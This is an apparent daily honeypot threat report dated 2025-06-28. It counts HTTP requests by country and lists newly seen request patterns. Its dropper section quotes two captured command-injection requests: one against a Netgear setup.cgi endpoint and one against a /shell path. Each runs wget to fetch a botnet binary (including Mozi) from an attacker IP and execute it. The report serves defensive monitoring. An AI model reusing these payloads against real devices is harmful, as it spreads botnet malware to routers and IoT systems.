Skip to main content
  1. Daily-Posts/

Report: 2025-06-28

·339 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-28
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 15 new requests that have never been observed before (these were added to the monitored request database.).

A total of 691 requests were recorded during the day, originating from 2 different countries, with a peak of 304 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country

botnet_dropper_behaviour
#

remote_addrrequest
61.3.104.188GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://61.3.104.188:47840/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.83GET /shell?rm arm7;wget http://141.98.11.83/m/arm7;chmod 777 arm7;./arm7 arm7 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
971\x00\x0E\x08T\xC5\xAE \xB1\x82p\x10\x00\x00\x00\x00\x00
981\x00\x0E8T\xC5\xAE \xB1\x82p\x10\x00\x00\x00\x00\x00
1031\x00\x0E\x08\x859hQ_\xFFX\x9F\x00\x00\x00\x00\x00
1061\x00\x0E\x08\xBC\xBE\xDEt\x17&\xC1\xE3\x00\x00\x00\x00\x00
1071\x00\x0E\x08\x22\xBC\x98=x\x06\x9D9\x00\x00\x00\x00\x00
1081\x00\x0E8\xBC\xBE\xDEt\x17&\xC1\xE3\x00\x00\x00\x00\x00
1121\x00\x0E8\x22\xBC\x98=x\x06\x9D9\x00\x00\x00\x00\x00
1201\x00\x0E8\x859hQ_\xFFX\x9F\x00\x00\x00\x00\x00
1221GET /odinhttpcall1751112573 HTTP/1.1
1231GET /OdinHttpCall1751112573 HTTP/1.1
1241GET /Odin/http/call1751112573 HTTP/1.1
1311\x00\x0E\x08\xF4I\xC7}P\xD2n#\x00\x00\x00\x00\x00
1331\x00\x0E8\xF4I\xC7}P\xD2n#\x00\x00\x00\x00\x00
1981GET /y9u5 HTTP/1.1
1991GET /NnHY HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0304US
153CN
250BG
349DE
437NL
525JP
620FR
718GB
813SC
912SG
1012LT
1111HK
128PL
137BR
147BE
157RU
166ZA
175AO
185KR
194MD
204GH
214VN
224IN
233KZ
243IL
253NG
262IE
272SE
282CA
292KW
301PE
311ES
321ID
331BY
341MY
351TH
361PA
371PT
381IT

Related

Report: 2025-06-27
·336 words
Repport Daily
Report: 2025-06-26
·457 words
Repport Daily
Report: 2025-06-25
·318 words
Repport Daily